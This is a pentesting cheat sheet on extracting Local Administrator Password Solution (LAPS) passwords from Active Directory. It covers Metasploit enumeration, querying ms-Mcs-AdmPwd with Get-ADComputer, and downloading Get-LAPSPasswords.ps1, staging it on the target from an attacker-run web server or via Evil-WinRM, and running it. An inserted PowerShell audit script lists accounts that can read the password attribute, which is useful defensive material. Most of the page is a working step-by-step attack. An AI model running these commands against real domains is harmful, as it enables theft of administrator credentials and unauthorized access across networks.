LAPS (Local Administrator Password Solution) Pentesting
Last modified: 2022-12-22
LAPS manages the local administrator password of domain-joined computers. Each computer's password is stored in Active Directory on its computer object, where only principals that have been granted read access can retrieve it.
Enumeration
msfconsole
use post/windows/gather/credentials/enum_laps
set session 2
exploit
Obtain Administrator's Password
First, check whether your current user is a member of the LAPS_Readers group.
net user <current-username>
# Global Group memberships *LAPS_Readers
Using Get-ADComputer
Get-ADComputer returns the Active Directory computer object. Requesting the ms-Mcs-AdmPwd property returns the stored LAPS password, provided your account has the right to read that attribute.
Get-ADComputer -Identity '<active-directory-computer-name>' -Properties 'ms-Mcs-AdmPwd'
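The membership check above only covers one group. The following audit script, added here and not part of the original page, lists every principal whose ACE on an OU grants the right needed to read ms-Mcs-AdmPwd, so that over-broad LAPS read rights can be found and removed. It assumes the ActiveDirectory module is installed; the OU distinguished name is a placeholder.

```powershell
# Added audit example (not from the original page): list every principal whose ACE on
# an OU grants the right needed to read ms-Mcs-AdmPwd, i.e. the LAPS password.
# Assumes the ActiveDirectory module; the OU passed in is a placeholder distinguished name.
Import-Module ActiveDirectory

function Get-LapsPasswordReaders {
    param([Parameter(Mandatory)][string] $OU)

    # ms-Mcs-AdmPwd is a confidential attribute: reading it needs the CONTROL_ACCESS
    # (ExtendedRight) bit scoped to that attribute's schemaIDGUID, or to all extended rights.
    $schemaNC = (Get-ADRootDSE).schemaNamingContext
    $attr = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(name=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
    if (-not $attr) { throw 'ms-Mcs-AdmPwd is not in the schema; legacy LAPS is not installed.' }
    $admPwdGuid = [guid]::new([byte[]]$attr.schemaIDGUID)
    $allRights  = [guid]::Empty   # ObjectType of an ACE that covers every extended right

    $extended = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $acl = Get-Acl -Path "AD:\$OU"   # the AD: drive is provided by the ActiveDirectory module
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # GenericAll also contains the ExtendedRight bit, so a full-control ACE is caught too.
        if (-not ($ace.ActiveDirectoryRights -band $extended)) { continue }
        if ($ace.ObjectType -ne $admPwdGuid -and $ace.ObjectType -ne $allRights) { continue }
        [pscustomobject]@{
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.ActiveDirectoryRights
            Scope     = $(if ($ace.ObjectType -eq $admPwdGuid) { 'ms-Mcs-AdmPwd' } else { 'all extended rights' })
            Inherited = $ace.IsInherited
        }
    }
}

# Placeholder OU; anything beyond the intended LAPS reader group and Domain Admins
# in this output is a finding to remove.
Get-LapsPasswordReaders -OU 'OU=Workstations,DC=example,DC=local' |
    Sort-Object Principal, Scope -Unique | Format-Table -AutoSize
```

Run it against each OU that holds computer objects; ACEs set directly on individual computer objects are not covered by an OU-level check.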
Using Get-LAPSPasswords.ps1
Download the Payload in Local Machine
If you are in LAPS_Readers, you can retrieve the administrator's password with Get-LAPSPasswords.ps1. Fetch the raw script (the blob URL returns the GitHub HTML page, not the script):
wget https://raw.githubusercontent.com/kfosaaen/Get-LAPSPasswords/master/Get-LAPSPasswords.ps1
Transfer the Payload to Target Machine
via PowerShell
First, start a web server on the local machine.
python3 -m http.server 8000
Then fetch the script from the target machine with curl.
curl http://<local-ip>:8000/Get-LAPSPasswords.ps1 -o .\Get-LAPSPasswords.ps1
via Evil-WinRM
If you connect to the remote Windows machine with Evil-WinRM, you can use the script directly by adding the -s flag when connecting.
evil-winrm -i <target-ip> -u username -p password -s /path/to/current/directory
Then upload the script from the Evil-WinRM console.
PS > upload .\Get-LAPSPasswords.ps1 c:\Users\<username>\Desktop\Get-LAPSPasswords.ps1
Execute the Payload in Target Machine
.\Get-LAPSPasswords.ps1